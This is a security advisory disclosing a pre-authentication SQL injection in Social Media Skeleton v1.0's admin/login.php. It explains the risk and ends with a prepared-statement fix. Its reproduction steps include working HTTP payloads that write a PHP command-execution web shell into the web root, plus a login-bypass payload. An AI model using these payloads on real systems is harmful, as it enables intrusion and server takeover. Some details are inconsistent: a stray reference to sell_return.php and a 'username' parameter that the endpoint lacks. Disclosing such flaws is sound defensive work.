Pre-Auth SQLi leading to RCE in Social Media Skeleton v1.0 in fobybus/social-media-skeleton
Aug 1st 2023
A SQL Injection vulnerability exists in Social Media Skeleton v1.0 via the username and password parameters in admin/login.php. Not to be confused with login.php, which properly escapes special characters.
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.
Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.
The affected script takes values from a POST request and concatenates them directly into a SQL query (admin/login.php, lines 4-5):
This value is parsed as an array which can be manipulated to contain a malicious payload sell_return.php lines 8-9
```php
$query="select * from admin where email='$uemail' and password='$upass'";
$result=mysqli_query($dbcon,$query);
```
- Risk: HIGH
- Difficulty to Exploit: LOW
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
The vulnerable system can be exploited without interaction from any user.
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
There is a total loss of data integrity.
There is a total loss of availability.
Steps to reproduce
Attacker makes this request
```http
POST /social-media-skeleton/admin/login.php
Host: localhost
Content-Length: 124
Content-Type: application/x-www-form-urlencoded

email=1' UNION SELECT ' system($_GET["cmd"]); ','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' -- &password=anything
```
Or this request:
```http
POST /social-media-skeleton/admin/login.php
Host: localhost
Content-Length: 118
Content-Type: application/x-www-form-urlencoded

email=1&password=1' UNION SELECT ' system($_GET["cmd"]); ','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' --
```
The attacker should now be able to call the written PHP script to execute commands.
Affected Demographic/User Base
Any users of this service for their social media are at risk of having their data stolen, manipulated, or destroyed. The host of this server is at risk of system compromise.
Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead.
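The following is an added example of that fix, not code from the Social Media Skeleton project: the same admin lookup rewritten with a mysqli prepared statement. It assumes `$dbcon` is an open mysqli connection (as in the original snippet) and, unlike the original plaintext comparison, that the `password` column holds `password_hash()` digests.

```php
<?php
// Added example: parameterized replacement for the query in admin/login.php.
// Assumes $dbcon is an already-open mysqli connection (e.g. from a config include)
// and that admin.password stores password_hash() digests (an assumption).
session_start();

function admin_login(mysqli $dbcon, string $email, string $password): ?array
{
    // The "?" placeholder keeps user input out of the SQL text, so a value such as
    // 1' UNION SELECT ... INTO OUTFILE ... is only ever compared to the email column
    // as a literal string and never changes the statement's structure.
    $stmt = $dbcon->prepare('SELECT id, email, password FROM admin WHERE email = ? LIMIT 1');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // requires the mysqlnd driver
    $stmt->close();

    // The password never touches SQL at all; it is checked against the stored hash.
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// Same POST parameters as the original endpoint (email, password).
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $email    = (string) ($_POST['email'] ?? '');
    $password = (string) ($_POST['password'] ?? '');

    $admin = admin_login($dbcon, $email, $password);
    if ($admin === null) {
        http_response_code(401);
        exit('Invalid credentials');
    }
    session_regenerate_id(true);          // prevent session fixation on login
    $_SESSION['admin_id'] = $admin['id'];
    header('Location: index.php');
    exit;
}
```

As defence in depth, the web application's database account should not hold the MySQL FILE privilege (which INTO OUTFILE requires) and secure_file_priv should be set, so that even a successful injection could not write a file into the web root.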
For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as email@example.com. The author of this project has been contacted and this information has been shared.
An attacker who finds this system can forge a request to the admin/login.php endpoint and create a malicious PHP file. This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can call a reverse shell with the permissions of the user running the webapp.
This is a UNION based injection attack, but more generally in the class of SQL injections: Attackers can use these types of attacks to modify, add, or delete data from the remote database.
The attacker could also use this attack to log in as an administrator with the payload:
username=1' OR '1=1' -- &password=anything